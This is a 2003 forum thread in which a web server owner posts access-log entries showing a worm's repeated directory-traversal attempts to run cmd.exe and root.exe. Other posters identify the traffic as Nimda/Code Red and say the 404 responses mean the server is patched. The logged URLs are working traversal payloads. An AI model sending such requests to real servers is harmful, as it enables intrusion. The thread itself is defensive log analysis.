-
March 5th, 2003, 01:28 AM
#1
Whats he using... ?
For the past 17 hours, the same IP has been giving me the following log files on my web server:
[04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
[04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
[04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
[04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
He is obviously using a "tool" to do this, seeing how rapid the requests are, and the fact that hes been doing it pretty consistently over the past 17 hours... do any of you know what program he is using? I would think the logs would be a pretty tell tale sign of what he was using...
Also, if these attacks go on any longer, im going to want to take some kind of action against him. What steps would be plausable in this situation?
Thanks,
slick_shoes
-
March 5th, 2003, 01:46 AM
#2
Not completely sure, but this looks pretty much the same as another set of logs which have been posted just recently in another thread. You can find more information in the following threads:
Apache Security Question
hacked
-
March 5th, 2003, 01:46 AM
#3
Senior Member
Contact the person's ISP and give them the IP and the time table of the events. They'll choose their own course of action.
what is love but contempt for hate?
-
March 5th, 2003, 02:30 AM
#4
It's a pretty basic Nimca/code red automated thing..... See it all the time on my boxes.... If you are patched... which you appear to be by the 404 error codes in the log you have nothing to worry about......
Complaining to the ISP will become a full time job..... If it's not a pain for you go ahead and send the logs..... But it will become a problem if you host web sites....
Don\'t SYN us.... We\'ll SYN you.....
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
March 5th, 2003, 02:56 AM
#5
Thanks for the replies...
Have a good day!
slick_shoes
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|